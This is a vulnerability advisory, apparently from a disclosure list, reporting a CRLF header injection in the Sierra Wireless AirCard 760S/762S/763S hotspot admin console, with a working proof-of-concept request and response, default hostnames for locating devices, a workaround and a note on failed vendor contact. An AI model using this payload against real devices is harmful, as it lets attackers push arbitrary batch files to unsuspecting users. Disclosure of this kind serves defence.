Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

[*] Overview

Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.

The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.

[*] Description

The configuration export function allows the name of the exported
configuration file to be customised, but the parameter "save" is not
filtered.

http://​<routerURL>/export.cfg?save=export.cfg


[*] Traffic sample from POC

(curl -L)
(sample below tested on firmware SWI9200H2_03.05.11.00AP)

> GET /export.cfg?save=
> export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a
> &sessionId=00000001%2DhYL4H
> 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1
> > User-Agent: curl/7.40.0
> > Host: router.4g
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> < Server: httpd/2.7 (sierra; D4C)
> < Date: Mon, 12 Jan 2015 05:32:38 GMT
> < Connection: keep-alive
> < Cache-Control: no-cache
> < Content-Disposition: attachment; filename=export.bat
> < Content-type: application/bat
>
> pause


> Content-type: application/octet-stream
> Transfer-encoding: chunked
> 3a
> #
> # Configuration export from Telstra WI-FI 4G
> #
> # Model:


[*] Limitations

While it does not require authentication, it does require user interaction
and knowledge of the hotspot's hostname.

However, the default hotspot names are well-known, based on the OEM'd
version of the AirCard Mobile Hotspot:

* 763S - Sierra Wireless Original OEM - http://aircard.hotspot
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g
* 760S - BigPond Mobile - http://bigpond.4g

[*] Workaround

Change the name and IP address of the device to something other than the
default settings.

[*] Vendor Contact

An attempt to contact both Sierra Wireless and NETGEAR (who seem to own
support of the device now) was unsuccessful.

​regards
,
Luke